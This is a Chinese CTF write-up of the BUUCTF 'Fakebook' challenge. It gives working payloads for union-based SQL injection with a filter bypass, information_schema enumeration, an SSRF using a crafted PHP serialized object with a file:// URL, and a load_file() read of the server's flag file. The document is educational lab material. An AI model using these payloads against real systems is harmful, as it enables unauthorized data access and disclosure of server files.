BUUCTF__[网鼎杯 2018]Fakebook_题解

前言

  • 前天上午去报名了初中辅导老师,下午收到暑假可能可以回学校学习。。。真就尴尬。如果可以,回还是不回。
  • 参加了2020年的网鼎杯,签到杯,神仙打架,萌新不配参加,下次一定。

读题

  • 这题有点意思,虽然是sql注入,但注入点不在平常的注册登录那里,而是在view.php , 但是,远远不是sql注入那么简单。

  • 首先拿到题很容易发现,f12看到get传参就注意了一下。
    BUUCTF__[网鼎杯 2018]Fakebook_题解_第1张图片

  • 随便传入一个字母发现报错提示,就很明显的sql注入点了。并且暴露了网站根目录。
    BUUCTF__[网鼎杯 2018]Fakebook_题解_第2张图片

  • 这回跑字典啥也没跑出来,都是sql语句报错。好像都没被过滤。

  • 那就手工试一下,联合注入,启动。

  • 先测试列,在列5时报错,看来有4列

      ?no=100 order by 5#
    
  • 然后测试回显位,这步是之前没用过的,原因是以前的sql注入都是很明显的账号密码,很容易知道回显位。

      ?no=100 union select 1,2,3,4#
    
  • 嗯?提示过滤。why?
    在这里插入图片描述

  • 把payload拆开看看过滤了什么,发现单个单词都没过滤,过滤了union select

  • 网上找到绕过方法union/**/select,也可以放弃联合注入用报错注入。一样可行

  • 修改payload再次尝试

      ?no=100 union/**/select 1,2,3,4#
    
  • 得到回显位为2
    BUUCTF__[网鼎杯 2018]Fakebook_题解_第3张图片

  • 将2 替换为database() ,再次尝试,得到数据库名称facebook

    ?no=100 union/**/select 1,database(),3,4#
    

BUUCTF__[网鼎杯 2018]Fakebook_题解_第4张图片

  • 继续得到表的名称users

    ?no=100 union/**/select 2,group_concat(table_name),2,2 from information_schema.tables where table_schema=database()#
    

BUUCTF__[网鼎杯 2018]Fakebook_题解_第5张图片

  • 进一步得到字段名,有多个:no,username,passwd,data,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS

    ?no=100 union/**/select 2,group_concat(column_name),2,2 from information_schema.columns where table_name='users'#
    

BUUCTF__[网鼎杯 2018]Fakebook_题解_第6张图片

  • 尝试读取内容,以为到此结束,没想到,这才刚刚开始。读取内容发现字段 data 有一组序列化后的字符串,其它字段也没什么内容。此时注意到,这就是我们刚刚注册填的内容

    ?no=100 union/**/select 2,group_concat(data),2,2 from users#
    

BUUCTF__[网鼎杯 2018]Fakebook_题解_第7张图片

  • 注入到此结束,没有得到flag。显然网鼎杯的题目怎么可能这么简单。

研究

一、robots.txt__源码泄露

  • 很多网站都会有这个文件,比如说百度、谷歌都有,直接访问/robots.txt 就行
  • 作用是告诉搜索引擎该网站可以访问的范围。但
  • 这个知识点之前知道,但没想到这里用上了。
  • 访问,发现有一个user.php.bak
    BUUCTF__[网鼎杯 2018]Fakebook_题解_第8张图片
  • 访问/user.php.bak 下载了一个文件,去除后缀名.bak得到user.php,源码泄露。



class UserInfo
{
     
    public $name = "";
    public $age = 0;
    public $blog = "";

    public function __construct($name, $age, $blog)
    {
     
        $this->name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    }

    function get($url)
    {
     
        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
     
            return 404;
        }
        curl_close($ch);

        return $output;
    }

    public function getBlogContents ()
    {
     
        return $this->get($this->blog);
    }

    public function isValidBlog ()
    {
     
        $blog = $this->blog;
        return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
    }

}
  • 主要关注一下get函数,没看过的函数没关系,百度函数功能。
  • 大概理解是将我们输入的blog,调用get函数创建链接我们填的url,将访问该url返回的内容在页面输出。这里就是我们利用的点。

二、ssrf__服务端请求伪造

  • ssrf是什么?参考这篇文章比较好理解。
  • 本来应该是让它返回我们填的blog页面内容,但是我们读啥呢???
  • 万万没想到,题目还有一个flag.php,得扫描,能不能扫出来,还得看你字典有没有。但是一般比赛都直接说明题目不需要扫描器,怕服务器承受不住。
  • 所以,我们可以填http:127.0.0.1/flag.php ,然后让上面说的调用get函数访问它并返回显示内容吗?不行,看上面源码,过滤了http/https。
  • 所以,继续往下

三、file协议__读取本地文件

  • file协议是什么?参考这篇文章
  • 可以绕过http读取文件,同时有前面也暴露了解对路径。很明确。
  • 那为啥不在注册的时候blog直接填file:///var/www/html/flag.php ,然后你会发现,报错不能注册。所以还得往下。

四、php序列化

  • 由上面的data字段内容可以得知,我们的注册信息,是以反序列化字符串储存的。
  • 以序列化的方式存储在data字段中,查询时返回序列化字符串后先进行反序列化后再提取blog网址。
    BUUCTF__[网鼎杯 2018]Fakebook_题解_第9张图片
  • 那如果让它查询返回的是包含file:///var/www/html/flag.php的序列化字符串,那它提取时就是访问了flag.php文件并返回。解决了上面注册的过滤。
  • 所以,我们先构造一个php序列化字符串。


class UserInfo
{
     
    public $name = "1";
    public $age = 0;
    public $blog = "file:///var/www/html/flag.php";
	
}

$a = new UserInfo();
echo serialize($a);
?>
  • 得到

    O:8:"UserInfo":3:{s:4:"name";s:1:"1";s:3:"age";i:1;s:4:"blog";s:29:"file:///var/www/html/flag.php";}
    

五、最后解题

  • 所以,只需要让它返回我们构造的php序列化字符串里的内容,再一次sql联合注入,返回查询内容为file:///var/www/html/flag.php

    ?no=100 union/**/select 1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:1:"1";s:3:"age";i:1;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'
    

在这里插入图片描述

  • iframe标签里,有base64编码后的字符串,点击就是flag。为啥在iframe标签里,试试正常注册一个blog,f12看看有什么。
    在这里插入图片描述BUUCTF__[网鼎杯 2018]Fakebook_题解_第10张图片

  • 成功得到flag

六、其它方法

  • 看wp还看到一种解法,直接通过sql读取函数直接读取flag.php文件

    ?no=100 union/**/select 1,load_file('/var/www/html/flag.php'),3,4 #
    

BUUCTF__[网鼎杯 2018]Fakebook_题解_第11张图片

  • 主要是mysql的load_file函数,可以百度了解。

最后

  • 理一下思路,我终止在sql注入结束,看wp才发现原来这么复杂,先知道了data字段中序列化储存,再得知user.php源码泄露,通过源码得知得可以用file协议利用ssrf漏洞读取文件,再通过序列化去读取flag.php。
  • 很综合的一道题,不愧是网鼎杯。
  • 做完做题可以去丰富目录字典了。
  • 附上题目链接
  • 持续更新BUUCTF题解,写的不是很好,欢迎指正。
  • 最后欢迎来访个人博客

你可能感兴趣的:(BUU做题记录)